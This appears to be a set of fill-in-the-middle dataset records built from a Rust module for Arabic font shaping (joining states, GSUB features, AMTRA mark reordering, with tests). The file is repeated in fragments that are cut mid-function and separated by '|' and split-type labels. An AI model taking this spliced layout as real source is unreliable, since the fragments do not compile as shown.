arabic_glyphs,
0,
arabic_glyphs.len(),
|g| pred(g, feature_tag),
)?;
}
Ok(())
}
/// Reorder Arabic marks per AMTRA. See: https://www.unicode.org/reports/tr53/.
pub(super) fn reorder_marks(cs: &mut [char]) {
sort_by_modified_combining_class(cs);
for css in
cs.split_mut(|&c| modified_combining_class(c) == ModifiedCombiningClass::NotReordered)
{
reorder_marks_shadda(css);
reorder_marks_other_combining(css, ModifiedCombiningClass::Above);
reorder_marks_other_combining(css, ModifiedCombiningClass::Below);
}
}
fn reorder_marks_shadda(cs: &mut [char]) {
use std::cmp::Ordering;
// 2a. Move any Shadda characters to the beginning of S, where S is a max
// length substring of non-starter characters.
fn comparator(c1: &char, _c2: &char) -> Ordering {
if modified_combining_class(*c1) == ModifiedCombiningClass::CCC33 {
Ordering::Less
} else {
Ordering::Equal
}
}
cs.sort_by(comparator)
}
fn reorder_marks_other_combining(cs: &mut [char], mcc: ModifiedCombiningClass) {
debug_assert!(mcc == ModifiedCombiningClass::Below || mcc == ModifiedCombiningClass::Above);
// Get the start index of a possible sequence of characters with canonical
// combining class equal to `mcc`. (Assumes that `glyphs` is normalised to
// NFD.)
let first = cs.iter().position(|&c| modified_combining_class(c) == mcc);
if let Some(first) = first {
// 2b/2c. If the sequence of characters _begins_ with any MCM characters,
// move the sequence of such characters to the beginning of S.
let count = cs[first..]
.iter()
.take_while(|&&c| is_modifier_combining_mark(c))
.count();
cs[..(first + count)].rotate_right(count);
}
}
fn is_modifier_combining_mark(ch: char) -> bool {
// https://www.unicode.org/reports/tr53/tr53-6.html#MCM
match ch {
| '\u{0654}' // ARABIC HAMZA ABOVE
| '\u{0655}' // ARABIC HAMZA BELOW
| '\u{0658}' // ARABIC MARK NOON GHUNNA
| '\u{06DC}' // ARABIC SMALL HIGH SEEN
| '\u{06E3}' // ARABIC SMALL LOW SEEN
| '\u{06E7}' // ARABIC SMALL HIGH YEH
| '\u{06E8}' // ARABIC SMALL HIGH NOON
| '\u{08CA}' // ARABIC SMALL HIGH FARSI YEH
| '\u{08CB}' // ARABIC SMALL HIGH YEH BARREE WITH TWO DOTS BELOW
| '\u{08CD}' // ARABIC SMALL HIGH ZAH
| '\u{08CE}' // ARABIC LARGE ROUND DOT ABOVE
| '\u{08CF}' // ARABIC LARGE ROUND DOT BELOW
| '\u{08D3}' // ARABIC SMALL LOW WAW
| '\u{08F3}' => true, // ARABIC SMALL HIGH WAW
_ => false,
} | #[cfg(test)]
mod tests {
use super::*;
// https://www.unicode.org/reports/tr53/#Demonstrating_AMTRA.
mod reorder_marks {
use super::*;
#[test]
fn test_artificial() {
let cs = vec![
'\u{0618}', '\u{0619}', '\u{064E}', '\u{064F}', '\u{0654}', '\u{0658}', '\u{0653}',
'\u{0654}', '\u{0651}', '\u{0656}', '\u{0651}', '\u{065C}', '\u{0655}', '\u{0650}',
];
let cs_exp = vec![
'\u{0654}', '\u{0658}', '\u{0651}', '\u{0651}', '\u{0618}', '\u{064E}', '\u{0619}',
'\u{064F}', '\u{0650}', '\u{0656}', '\u{065C}', '\u{0655}', '\u{0653}', '\u{0654}',
];
test_reorder_marks(&cs, &cs_exp);
}
// Variant of `test_artificial` where U+0656 is replaced with U+0655
// to test the reordering of MCM characters for the ccc = 220 group.
#[test]
fn test_artificial_custom() {
let cs = vec![
'\u{0618}', '\u{0619}', '\u{064E}', '\u{064F}', '\u{0654}', '\u{0658}', '\u{0653}',
'\u{0654}', '\u{0651}', '\u{0655}', '\u{0651}', '\u{065C}', '\u{0655}', '\u{0650}',
];
let cs_exp = vec![
'\u{0655}', '\u{0654}', '\u{0658}', '\u{0651}', '\u{0651}', '\u{0618}', '\u{064E}',
'\u{0619}', '\u{064F}', '\u{0650}', '\u{065C}', '\u{0655}', '\u{0653}', '\u{0654}',
];
test_reorder_marks(&cs, &cs_exp);
}
#[test]
fn test_example1() {
let cs1 = vec!['\u{0627}', '\u{064F}', '\u{0654}'];
let cs1_exp = vec!['\u{0627}', '\u{0654}', '\u{064F}'];
test_reorder_marks(&cs1, &cs1_exp);
let cs2 = vec!['\u{0627}', '\u{064F}', '\u{034F}', '\u{0654}'];
test_reorder_marks(&cs2, &cs2);
let cs3 = vec!['\u{0649}', '\u{0650}', '\u{0655}'];
let cs3_exp = vec!['\u{0649}', '\u{0655}', '\u{0650}'];
test_reorder_marks(&cs3, &cs3_exp);
let cs4 = vec!['\u{0649}', '\u{0650}', '\u{034F}', '\u{0655}'];
test_reorder_marks(&cs4, &cs4);
}
#[test]
fn test_example2a() {
let cs = vec!['\u{0635}', '\u{06DC}', '\u{0652}'];
test_reorder_marks(&cs, &cs);
}
#[test]
fn test_example2b() {
let cs1 = vec!['\u{0647}', '\u{0652}', '\u{06DC}'];
let cs1_exp = vec!['\u{0647}', '\u{06DC}', '\u{0652}'];
test_reorder_marks(&cs1, &cs1_exp);
let cs2 = vec!['\u{0647}', '\u{0652}', '\u{034F}', '\u{06DC}'];
test_reorder_marks(&cs2, &cs2);
}
#[test]
fn test_example3() {
let cs1 = vec!['\u{0640}', '\u{0650}', '\u{0651}', '\u{06E7}'];
// The expected output in https://www.unicode.org/reports/tr53/#Example3
//
// [U+0640, U+0650, U+06E7, U+0651]
//
// is incorrect, in that it fails to account for U+0651 Shadda moving to
// the front of U+0650 Kasra, per step 2a of AMTRA.
//
// U+06E7 Small High Yeh should then move to the front of Shadda per step
// 2b, resulting in:
let cs1_exp = vec!['\u{0640}', '\u{06E7}', '\u{0651}', '\u{0650}'];
test_reorder_marks(&cs1, &cs1_exp);
let cs2 = vec!['\u{0640}', '\u{0650}', '\u{0651}', '\u{034F}', '\u{06E7}'];
// As above, Shadda should move to the front of Kasra, so the expected
// output in https://www.unicode.org/reports/tr53/#Example3
//
// [U+0640, U+0650, U+0651, U+034F, U+06E7]
//
// (i.e. no changes) is also incorrect.
let cs2_exp = vec!['\u{0640}', '\u{0651}', '\u{0650}', '\u{034F}', '\u{06E7}'];
test_reorder_marks(&cs2, &cs2_exp);
}
#[test]
fn test_example4a() {
let cs = vec!['\u{0640}', '\u{0652}', '\u{034F}', '\u{06E8}'];
test_reorder_marks(&cs, &cs);
}
#[test]
fn test_example4b() {
let cs1 = vec!['\u{06C6}', '\u{064F}', '\u{06E8}'];
let cs1_exp = vec!['\u{06C6}', '\u{06E8}', '\u{064F}'];
test_reorder_marks(&cs1, &cs1_exp);
let cs2 = vec!['\u{06C6}', '\u{064F}', '\u{034F}', '\u{06E8}'];
test_reorder_marks(&cs2, &cs2);
}
fn test_reorder_marks(cs: &Vec<char>, cs_exp: &Vec<char>) {
let mut cs_act = cs.clone();
reorder_marks(&mut cs_act);
assert_eq!(cs_exp, &cs_act);
}
}
} | }
| random_line_split |
arabic.rs | //! Implementation of font shaping for Arabic scripts
//!
//! Code herein follows the specification at:
//! <https://github.com/n8willis/opentype-shaping-documents/blob/master/opentype-shaping-arabic-general.md>
use crate::error::{ParseError, ShapingError};
use crate::gsub::{self, FeatureMask, GlyphData, GlyphOrigin, RawGlyph};
use crate::layout::{GDEFTable, LayoutCache, LayoutTable, GSUB};
use crate::tag;
use crate::unicode::mcc::{
modified_combining_class, sort_by_modified_combining_class, ModifiedCombiningClass,
};
use std::convert::From;
use unicode_joining_type::{get_joining_type, JoiningType};
#[derive(Clone)]
struct ArabicData {
joining_type: JoiningType,
feature_tag: u32,
}
impl GlyphData for ArabicData {
fn merge(data1: ArabicData, _data2: ArabicData) -> ArabicData {
// TODO hold off for future Unicode normalisation changes
data1
}
}
// Arabic glyphs are represented as `RawGlyph` structs with `ArabicData` for its `extra_data`.
type ArabicGlyph = RawGlyph<ArabicData>;
impl ArabicGlyph {
fn is_transparent(&self) -> bool {
self.extra_data.joining_type == JoiningType::Transparent || self.multi_subst_dup
}
fn is_left_joining(&self) -> bool {
self.extra_data.joining_type == JoiningType::LeftJoining
|| self.extra_data.joining_type == JoiningType::DualJoining
|| self.extra_data.joining_type == JoiningType::JoinCausing
}
fn is_right_joining(&self) -> bool {
self.extra_data.joining_type == JoiningType::RightJoining
|| self.extra_data.joining_type == JoiningType::DualJoining
|| self.extra_data.joining_type == JoiningType::JoinCausing
}
fn feature_tag(&self) -> u32 {
self.extra_data.feature_tag
}
fn set_feature_tag(&mut self, feature_tag: u32) {
self.extra_data.feature_tag = feature_tag
}
}
impl From<&RawGlyph<()>> for ArabicGlyph {
fn from(raw_glyph: &RawGlyph<()>) -> ArabicGlyph {
// Since there's no `Char` to work out the `ArabicGlyph`s joining type when the glyph's
// `glyph_origin` is `GlyphOrigin::Direct`, we fallback to `JoiningType::NonJoining` as
// the safest approach
let joining_type = match raw_glyph.glyph_origin {
GlyphOrigin::Char(c) => get_joining_type(c),
GlyphOrigin::Direct => JoiningType::NonJoining,
};
ArabicGlyph {
unicodes: raw_glyph.unicodes.clone(),
glyph_index: raw_glyph.glyph_index,
liga_component_pos: raw_glyph.liga_component_pos,
glyph_origin: raw_glyph.glyph_origin,
small_caps: raw_glyph.small_caps,
multi_subst_dup: raw_glyph.multi_subst_dup,
is_vert_alt: raw_glyph.is_vert_alt,
fake_bold: raw_glyph.fake_bold,
fake_italic: raw_glyph.fake_italic,
variation: raw_glyph.variation,
extra_data: ArabicData {
joining_type,
// For convenience, we loosely follow the spec (`2. Computing letter joining
// states`) here by initialising all `ArabicGlyph`s to `tag::ISOL`
feature_tag: tag::ISOL,
},
}
}
}
impl From<&ArabicGlyph> for RawGlyph<()> {
fn from(arabic_glyph: &ArabicGlyph) -> RawGlyph<()> {
RawGlyph {
unicodes: arabic_glyph.unicodes.clone(),
glyph_index: arabic_glyph.glyph_index,
liga_component_pos: arabic_glyph.liga_component_pos,
glyph_origin: arabic_glyph.glyph_origin,
small_caps: arabic_glyph.small_caps,
multi_subst_dup: arabic_glyph.multi_subst_dup,
is_vert_alt: arabic_glyph.is_vert_alt,
fake_bold: arabic_glyph.fake_bold,
variation: arabic_glyph.variation,
fake_italic: arabic_glyph.fake_italic,
extra_data: (),
}
}
}
pub fn gsub_apply_arabic(
gsub_cache: &LayoutCache<GSUB>,
gsub_table: &LayoutTable<GSUB>,
gdef_table: Option<&GDEFTable>,
script_tag: u32,
lang_tag: Option<u32>,
raw_glyphs: &mut Vec<RawGlyph<()>>,
) -> Result<(), ShapingError> {
match gsub_table.find_script(script_tag)? {
Some(s) => {
if s.find_langsys_or_default(lang_tag)?.is_none() {
return Ok(());
}
}
None => return Ok(()),
}
let arabic_glyphs = &mut raw_glyphs.iter().map(ArabicGlyph::from).collect();
// 1. Compound character composition and decomposition
apply_lookups(
FeatureMask::CCMP,
gsub_cache,
gsub_table,
gdef_table,
script_tag,
lang_tag,
arabic_glyphs,
|_, _| true,
)?;
// 2. Computing letter joining states
{
let mut previous_i = arabic_glyphs
.iter()
.position(|g| !g.is_transparent())
.unwrap_or(0);
for i in (previous_i + 1)..arabic_glyphs.len() {
if arabic_glyphs[i].is_transparent() |
if arabic_glyphs[previous_i].is_left_joining() && arabic_glyphs[i].is_right_joining() {
arabic_glyphs[i].set_feature_tag(tag::FINA);
match arabic_glyphs[previous_i].feature_tag() {
tag::ISOL => arabic_glyphs[previous_i].set_feature_tag(tag::INIT),
tag::FINA => arabic_glyphs[previous_i].set_feature_tag(tag::MEDI),
_ => {}
}
}
previous_i = i;
}
}
// 3. Applying the stch feature
//
// TODO hold off for future generalised solution (including the Syriac Abbreviation Mark)
// 4. Applying the language-form substitution features from GSUB
const LANGUAGE_FEATURES: &[(FeatureMask, bool)] = &[
(FeatureMask::LOCL, true),
(FeatureMask::ISOL, false),
(FeatureMask::FINA, false),
(FeatureMask::MEDI, false),
(FeatureMask::INIT, false),
(FeatureMask::RLIG, true),
(FeatureMask::RCLT, true),
(FeatureMask::CALT, true),
];
for &(feature_mask, is_global) in LANGUAGE_FEATURES {
apply_lookups(
feature_mask,
gsub_cache,
gsub_table,
gdef_table,
script_tag,
lang_tag,
arabic_glyphs,
|g, feature_tag| is_global || g.feature_tag() == feature_tag,
)?;
}
// 5. Applying the typographic-form substitution features from GSUB
//
// Note that we skip `GSUB`'s `DLIG` and `CSWH` features as results would differ from other
// Arabic shapers
const TYPOGRAPHIC_FEATURES: &[FeatureMask] = &[FeatureMask::LIGA, FeatureMask::MSET];
for &feature_mask in TYPOGRAPHIC_FEATURES {
apply_lookups(
feature_mask,
gsub_cache,
gsub_table,
gdef_table,
script_tag,
lang_tag,
arabic_glyphs,
|_, _| true,
)?;
}
// 6. Mark reordering
//
// Handled in the text preprocessing stage.
*raw_glyphs = arabic_glyphs.iter().map(RawGlyph::from).collect();
Ok(())
}
fn apply_lookups(
feature_mask: FeatureMask,
gsub_cache: &LayoutCache<GSUB>,
gsub_table: &LayoutTable<GSUB>,
gdef_table: Option<&GDEFTable>,
script_tag: u32,
lang_tag: Option<u32>,
arabic_glyphs: &mut Vec<ArabicGlyph>,
pred: impl Fn(&ArabicGlyph, u32) -> bool + Copy,
) -> Result<(), ParseError> {
let index = gsub::get_lookups_cache_index(gsub_cache, script_tag, lang_tag, feature_mask)?;
let lookups = &gsub_cache.cached_lookups.borrow()[index];
for &(lookup_index, feature_tag) in lookups {
gsub::gsub_apply_lookup(
gsub_cache,
gsub_table,
gdef_table,
lookup_index,
feature_tag,
None,
arabic_glyphs,
0,
arabic_glyphs.len(),
|g| pred(g, feature_tag),
)?;
}
Ok(())
}
/// Reorder Arabic marks per AMTRA. See: https://www.unicode.org/reports/tr53/.
pub(super) fn reorder_marks(cs: &mut [char]) {
sort_by_modified_combining_class(cs);
for css in
cs.split_mut(|&c| modified_combining_class(c) == ModifiedCombiningClass::NotReordered)
{
reorder_marks_shadda(css);
reorder_marks_other_combining(css, ModifiedCombiningClass::Above);
reorder_marks_other_combining(css, ModifiedCombiningClass::Below);
}
}
fn reorder_marks_shadda(cs: &mut [char]) {
use std::cmp::Ordering;
// 2a. Move any Shadda characters to the beginning of S, where S is a max
// length substring of non-starter characters.
fn comparator(c1: &char, _c2: &char) -> Ordering {
if modified_combining_class(*c1) == ModifiedCombiningClass::CCC33 {
Ordering::Less
} else {
Ordering::Equal
}
}
cs.sort_by(comparator)
}
fn reorder_marks_other_combining(cs: &mut [char], mcc: ModifiedCombiningClass) {
debug_assert!(mcc == ModifiedCombiningClass::Below || mcc == ModifiedCombiningClass::Above);
// Get the start index of a possible sequence of characters with canonical
// combining class equal to `mcc`. (Assumes that `glyphs` is normalised to
// NFD.)
let first = cs.iter().position(|&c| modified_combining_class(c) == mcc);
if let Some(first) = first {
// 2b/2c. If the sequence of characters _begins_ with any MCM characters,
// move the sequence of such characters to the beginning of S.
let count = cs[first..]
.iter()
.take_while(|&&c| is_modifier_combining_mark(c))
.count();
cs[..(first + count)].rotate_right(count);
}
}
fn is_modifier_combining_mark(ch: char) -> bool {
// https://www.unicode.org/reports/tr53/tr53-6.html#MCM
match ch {
| '\u{0654}' // ARABIC HAMZA ABOVE
| '\u{0655}' // ARABIC HAMZA BELOW
| '\u{0658}' // ARABIC MARK NOON GHUNNA
| '\u{06DC}' // ARABIC SMALL HIGH SEEN
| '\u{06E3}' // ARABIC SMALL LOW SEEN
| '\u{06E7}' // ARABIC SMALL HIGH YEH
| '\u{06E8}' // ARABIC SMALL HIGH NOON
| '\u{08CA}' // ARABIC SMALL HIGH FARSI YEH
| '\u{08CB}' // ARABIC SMALL HIGH YEH BARREE WITH TWO DOTS BELOW
| '\u{08CD}' // ARABIC SMALL HIGH ZAH
| '\u{08CE}' // ARABIC LARGE ROUND DOT ABOVE
| '\u{08CF}' // ARABIC LARGE ROUND DOT BELOW
| '\u{08D3}' // ARABIC SMALL LOW WAW
| '\u{08F3}' => true, // ARABIC SMALL HIGH WAW
_ => false,
}
}
#[cfg(test)]
mod tests {
use super::*;
// https://www.unicode.org/reports/tr53/#Demonstrating_AMTRA.
mod reorder_marks {
use super::*;
#[test]
fn test_artificial() {
let cs = vec![
'\u{0618}', '\u{0619}', '\u{064E}', '\u{064F}', '\u{0654}', '\u{0658}', '\u{0653}',
'\u{0654}', '\u{0651}', '\u{0656}', '\u{0651}', '\u{065C}', '\u{0655}', '\u{0650}',
];
let cs_exp = vec![
'\u{0654}', '\u{0658}', '\u{0651}', '\u{0651}', '\u{0618}', '\u{064E}', '\u{0619}',
'\u{064F}', '\u{0650}', '\u{0656}', '\u{065C}', '\u{0655}', '\u{0653}', '\u{0654}',
];
test_reorder_marks(&cs, &cs_exp);
}
// Variant of `test_artificial` where U+0656 is replaced with U+0655
// to test the reordering of MCM characters for the ccc = 220 group.
#[test]
fn test_artificial_custom() {
let cs = vec![
'\u{0618}', '\u{0619}', '\u{064E}', '\u{064F}', '\u{0654}', '\u{0658}', '\u{0653}',
'\u{0654}', '\u{0651}', '\u{0655}', '\u{0651}', '\u{065C}', '\u{0655}', '\u{0650}',
];
let cs_exp = vec![
'\u{0655}', '\u{0654}', '\u{0658}', '\u{0651}', '\u{0651}', '\u{0618}', '\u{064E}',
'\u{0619}', '\u{064F}', '\u{0650}', '\u{065C}', '\u{0655}', '\u{0653}', '\u{0654}',
];
test_reorder_marks(&cs, &cs_exp);
}
#[test]
fn test_example1() {
let cs1 = vec!['\u{0627}', '\u{064F}', '\u{0654}'];
let cs1_exp = vec!['\u{0627}', '\u{0654}', '\u{064F}'];
test_reorder_marks(&cs1, &cs1_exp);
let cs2 = vec!['\u{0627}', '\u{064F}', '\u{034F}', '\u{0654}'];
test_reorder_marks(&cs2, &cs2);
let cs3 = vec!['\u{0649}', '\u{0650}', '\u{0655}'];
let cs3_exp = vec!['\u{0649}', '\u{0655}', '\u{0650}'];
test_reorder_marks(&cs3, &cs3_exp);
let cs4 = vec!['\u{0649}', '\u{0650}', '\u{034F}', '\u{0655}'];
test_reorder_marks(&cs4, &cs4);
}
#[test]
fn test_example2a() {
let cs = vec!['\u{0635}', '\u{06DC}', '\u{0652}'];
test_reorder_marks(&cs, &cs);
}
#[test]
fn test_example2b() {
let cs1 = vec!['\u{0647}', '\u{0652}', '\u{06DC}'];
let cs1_exp = vec!['\u{0647}', '\u{06DC}', '\u{0652}'];
test_reorder_marks(&cs1, &cs1_exp);
let cs2 = vec!['\u{0647}', '\u{0652}', '\u{034F}', '\u{06DC}'];
test_reorder_marks(&cs2, &cs2);
}
#[test]
fn test_example3() {
let cs1 = vec!['\u{0640}', '\u{0650}', '\u{0651}', '\u{06E7}'];
// The expected output in https://www.unicode.org/reports/tr53/#Example3
//
// [U+0640, U+0650, U+06E7, U+0651]
//
// is incorrect, in that it fails to account for U+0651 Shadda moving to
// the front of U+0650 Kasra, per step 2a of AMTRA.
//
// U+06E7 Small High Yeh should then move to the front of Shadda per step
// 2b, resulting in:
let cs1_exp = vec!['\u{0640}', '\u{06E7}', '\u{0651}', '\u{0650}'];
test_reorder_marks(&cs1, &cs1_exp);
let cs2 = vec!['\u{0640}', '\u{0650}', '\u{0651}', '\u{034F}', '\u{06E7}'];
// As above, Shadda should move to the front of Kasra, so the expected
// output in https://www.unicode.org/reports/tr53/#Example3
//
// [U+0640, U+0650, U+0651, U+034F, U+06E7]
//
// (i.e. no changes) is also incorrect.
let cs2_exp = vec!['\u{0640}', '\u{0651}', '\u{0650}', '\u{034F}', '\u{06E7}'];
test_reorder_marks(&cs2, &cs2_exp);
}
#[test]
fn test_example4a() {
let cs = vec!['\u{0640}', '\u{0652}', '\u{034F}', '\u{06E8}'];
test_reorder_marks(&cs, &cs);
}
#[test]
fn test_example4b() {
let cs1 = vec!['\u{06C6}', '\u{064F}', '\u{06E8}'];
let cs1_exp = vec!['\u{06C6}', '\u{06E8}', '\u{064F}'];
test_reorder_marks(&cs1, &cs1_exp);
let cs2 = vec!['\u{06C6}', '\u{064F}', '\u{034F}', '\u{06E8}'];
test_reorder_marks(&cs2, &cs2);
}
fn test_reorder_marks(cs: &Vec<char>, cs_exp: &Vec<char>) {
let mut cs_act = cs.clone();
reorder_marks(&mut cs_act);
assert_eq!(cs_exp, &cs_act);
}
}
}
| {
continue;
} | conditional_block |
arabic.rs | //! Implementation of font shaping for Arabic scripts
//!
//! Code herein follows the specification at:
//! <https://github.com/n8willis/opentype-shaping-documents/blob/master/opentype-shaping-arabic-general.md>
use crate::error::{ParseError, ShapingError};
use crate::gsub::{self, FeatureMask, GlyphData, GlyphOrigin, RawGlyph};
use crate::layout::{GDEFTable, LayoutCache, LayoutTable, GSUB};
use crate::tag;
use crate::unicode::mcc::{
modified_combining_class, sort_by_modified_combining_class, ModifiedCombiningClass,
};
use std::convert::From;
use unicode_joining_type::{get_joining_type, JoiningType};
#[derive(Clone)]
struct ArabicData {
joining_type: JoiningType,
feature_tag: u32,
}
impl GlyphData for ArabicData {
fn merge(data1: ArabicData, _data2: ArabicData) -> ArabicData {
// TODO hold off for future Unicode normalisation changes
data1
}
}
// Arabic glyphs are represented as `RawGlyph` structs with `ArabicData` for its `extra_data`.
type ArabicGlyph = RawGlyph<ArabicData>;
impl ArabicGlyph {
fn is_transparent(&self) -> bool {
self.extra_data.joining_type == JoiningType::Transparent || self.multi_subst_dup
}
fn is_left_joining(&self) -> bool {
self.extra_data.joining_type == JoiningType::LeftJoining
|| self.extra_data.joining_type == JoiningType::DualJoining
|| self.extra_data.joining_type == JoiningType::JoinCausing
}
fn is_right_joining(&self) -> bool {
self.extra_data.joining_type == JoiningType::RightJoining
|| self.extra_data.joining_type == JoiningType::DualJoining
|| self.extra_data.joining_type == JoiningType::JoinCausing
}
fn feature_tag(&self) -> u32 {
self.extra_data.feature_tag
}
fn set_feature_tag(&mut self, feature_tag: u32) {
self.extra_data.feature_tag = feature_tag
}
}
impl From<&RawGlyph<()>> for ArabicGlyph {
fn from(raw_glyph: &RawGlyph<()>) -> ArabicGlyph {
// Since there's no `Char` to work out the `ArabicGlyph`s joining type when the glyph's
// `glyph_origin` is `GlyphOrigin::Direct`, we fallback to `JoiningType::NonJoining` as
// the safest approach
let joining_type = match raw_glyph.glyph_origin {
GlyphOrigin::Char(c) => get_joining_type(c),
GlyphOrigin::Direct => JoiningType::NonJoining,
};
ArabicGlyph {
unicodes: raw_glyph.unicodes.clone(),
glyph_index: raw_glyph.glyph_index,
liga_component_pos: raw_glyph.liga_component_pos,
glyph_origin: raw_glyph.glyph_origin,
small_caps: raw_glyph.small_caps,
multi_subst_dup: raw_glyph.multi_subst_dup,
is_vert_alt: raw_glyph.is_vert_alt,
fake_bold: raw_glyph.fake_bold,
fake_italic: raw_glyph.fake_italic,
variation: raw_glyph.variation,
extra_data: ArabicData {
joining_type,
// For convenience, we loosely follow the spec (`2. Computing letter joining
// states`) here by initialising all `ArabicGlyph`s to `tag::ISOL`
feature_tag: tag::ISOL,
},
}
}
}
impl From<&ArabicGlyph> for RawGlyph<()> {
fn from(arabic_glyph: &ArabicGlyph) -> RawGlyph<()> {
RawGlyph {
unicodes: arabic_glyph.unicodes.clone(),
glyph_index: arabic_glyph.glyph_index,
liga_component_pos: arabic_glyph.liga_component_pos,
glyph_origin: arabic_glyph.glyph_origin,
small_caps: arabic_glyph.small_caps,
multi_subst_dup: arabic_glyph.multi_subst_dup,
is_vert_alt: arabic_glyph.is_vert_alt,
fake_bold: arabic_glyph.fake_bold,
variation: arabic_glyph.variation,
fake_italic: arabic_glyph.fake_italic,
extra_data: (),
}
}
}
pub fn gsub_apply_arabic(
gsub_cache: &LayoutCache<GSUB>,
gsub_table: &LayoutTable<GSUB>,
gdef_table: Option<&GDEFTable>,
script_tag: u32,
lang_tag: Option<u32>,
raw_glyphs: &mut Vec<RawGlyph<()>>,
) -> Result<(), ShapingError> {
match gsub_table.find_script(script_tag)? {
Some(s) => {
if s.find_langsys_or_default(lang_tag)?.is_none() {
return Ok(());
}
}
None => return Ok(()),
}
let arabic_glyphs = &mut raw_glyphs.iter().map(ArabicGlyph::from).collect();
// 1. Compound character composition and decomposition
apply_lookups(
FeatureMask::CCMP,
gsub_cache,
gsub_table,
gdef_table,
script_tag,
lang_tag,
arabic_glyphs,
|_, _| true,
)?;
// 2. Computing letter joining states
{
let mut previous_i = arabic_glyphs
.iter()
.position(|g| !g.is_transparent())
.unwrap_or(0);
for i in (previous_i + 1)..arabic_glyphs.len() {
if arabic_glyphs[i].is_transparent() {
continue;
}
if arabic_glyphs[previous_i].is_left_joining() && arabic_glyphs[i].is_right_joining() {
arabic_glyphs[i].set_feature_tag(tag::FINA);
match arabic_glyphs[previous_i].feature_tag() {
tag::ISOL => arabic_glyphs[previous_i].set_feature_tag(tag::INIT),
tag::FINA => arabic_glyphs[previous_i].set_feature_tag(tag::MEDI),
_ => {}
}
}
previous_i = i;
}
}
// 3. Applying the stch feature
//
// TODO hold off for future generalised solution (including the Syriac Abbreviation Mark)
// 4. Applying the language-form substitution features from GSUB
const LANGUAGE_FEATURES: &[(FeatureMask, bool)] = &[
(FeatureMask::LOCL, true),
(FeatureMask::ISOL, false),
(FeatureMask::FINA, false),
(FeatureMask::MEDI, false),
(FeatureMask::INIT, false),
(FeatureMask::RLIG, true),
(FeatureMask::RCLT, true),
(FeatureMask::CALT, true),
];
for &(feature_mask, is_global) in LANGUAGE_FEATURES {
apply_lookups(
feature_mask,
gsub_cache,
gsub_table,
gdef_table,
script_tag,
lang_tag,
arabic_glyphs,
|g, feature_tag| is_global || g.feature_tag() == feature_tag,
)?;
}
// 5. Applying the typographic-form substitution features from GSUB
//
// Note that we skip `GSUB`'s `DLIG` and `CSWH` features as results would differ from other
// Arabic shapers
const TYPOGRAPHIC_FEATURES: &[FeatureMask] = &[FeatureMask::LIGA, FeatureMask::MSET];
for &feature_mask in TYPOGRAPHIC_FEATURES {
apply_lookups(
feature_mask,
gsub_cache,
gsub_table,
gdef_table,
script_tag,
lang_tag,
arabic_glyphs,
|_, _| true,
)?;
}
// 6. Mark reordering
//
// Handled in the text preprocessing stage.
*raw_glyphs = arabic_glyphs.iter().map(RawGlyph::from).collect();
Ok(())
}
fn apply_lookups(
feature_mask: FeatureMask,
gsub_cache: &LayoutCache<GSUB>,
gsub_table: &LayoutTable<GSUB>,
gdef_table: Option<&GDEFTable>,
script_tag: u32,
lang_tag: Option<u32>,
arabic_glyphs: &mut Vec<ArabicGlyph>,
pred: impl Fn(&ArabicGlyph, u32) -> bool + Copy,
) -> Result<(), ParseError> {
let index = gsub::get_lookups_cache_index(gsub_cache, script_tag, lang_tag, feature_mask)?;
let lookups = &gsub_cache.cached_lookups.borrow()[index];
for &(lookup_index, feature_tag) in lookups {
gsub::gsub_apply_lookup(
gsub_cache,
gsub_table,
gdef_table,
lookup_index,
feature_tag,
None,
arabic_glyphs,
0,
arabic_glyphs.len(),
|g| pred(g, feature_tag),
)?;
}
Ok(())
}
/// Reorder Arabic marks per AMTRA. See: https://www.unicode.org/reports/tr53/.
pub(super) fn reorder_marks(cs: &mut [char]) {
sort_by_modified_combining_class(cs);
for css in
cs.split_mut(|&c| modified_combining_class(c) == ModifiedCombiningClass::NotReordered)
{
reorder_marks_shadda(css);
reorder_marks_other_combining(css, ModifiedCombiningClass::Above);
reorder_marks_other_combining(css, ModifiedCombiningClass::Below);
}
}
fn reorder_marks_shadda(cs: &mut [char]) {
use std::cmp::Ordering;
// 2a. Move any Shadda characters to the beginning of S, where S is a max
// length substring of non-starter characters.
fn comparator(c1: &char, _c2: &char) -> Ordering {
if modified_combining_class(*c1) == ModifiedCombiningClass::CCC33 {
Ordering::Less
} else {
Ordering::Equal
}
}
cs.sort_by(comparator)
}
fn reorder_marks_other_combining(cs: &mut [char], mcc: ModifiedCombiningClass) {
debug_assert!(mcc == ModifiedCombiningClass::Below || mcc == ModifiedCombiningClass::Above);
// Get the start index of a possible sequence of characters with canonical
// combining class equal to `mcc`. (Assumes that `glyphs` is normalised to
// NFD.)
let first = cs.iter().position(|&c| modified_combining_class(c) == mcc);
if let Some(first) = first {
// 2b/2c. If the sequence of characters _begins_ with any MCM characters,
// move the sequence of such characters to the beginning of S.
let count = cs[first..]
.iter()
.take_while(|&&c| is_modifier_combining_mark(c))
.count();
cs[..(first + count)].rotate_right(count);
}
}
fn is_modifier_combining_mark(ch: char) -> bool {
// https://www.unicode.org/reports/tr53/tr53-6.html#MCM
match ch {
| '\u{0654}' // ARABIC HAMZA ABOVE
| '\u{0655}' // ARABIC HAMZA BELOW
| '\u{0658}' // ARABIC MARK NOON GHUNNA
| '\u{06DC}' // ARABIC SMALL HIGH SEEN
| '\u{06E3}' // ARABIC SMALL LOW SEEN
| '\u{06E7}' // ARABIC SMALL HIGH YEH
| '\u{06E8}' // ARABIC SMALL HIGH NOON
| '\u{08CA}' // ARABIC SMALL HIGH FARSI YEH
| '\u{08CB}' // ARABIC SMALL HIGH YEH BARREE WITH TWO DOTS BELOW
| '\u{08CD}' // ARABIC SMALL HIGH ZAH
| '\u{08CE}' // ARABIC LARGE ROUND DOT ABOVE
| '\u{08CF}' // ARABIC LARGE ROUND DOT BELOW
| '\u{08D3}' // ARABIC SMALL LOW WAW
| '\u{08F3}' => true, // ARABIC SMALL HIGH WAW
_ => false,
}
}
#[cfg(test)]
mod tests {
use super::*;
// https://www.unicode.org/reports/tr53/#Demonstrating_AMTRA.
mod reorder_marks {
use super::*;
#[test]
fn | () {
let cs = vec![
'\u{0618}', '\u{0619}', '\u{064E}', '\u{064F}', '\u{0654}', '\u{0658}', '\u{0653}',
'\u{0654}', '\u{0651}', '\u{0656}', '\u{0651}', '\u{065C}', '\u{0655}', '\u{0650}',
];
let cs_exp = vec![
'\u{0654}', '\u{0658}', '\u{0651}', '\u{0651}', '\u{0618}', '\u{064E}', '\u{0619}',
'\u{064F}', '\u{0650}', '\u{0656}', '\u{065C}', '\u{0655}', '\u{0653}', '\u{0654}',
];
test_reorder_marks(&cs, &cs_exp);
}
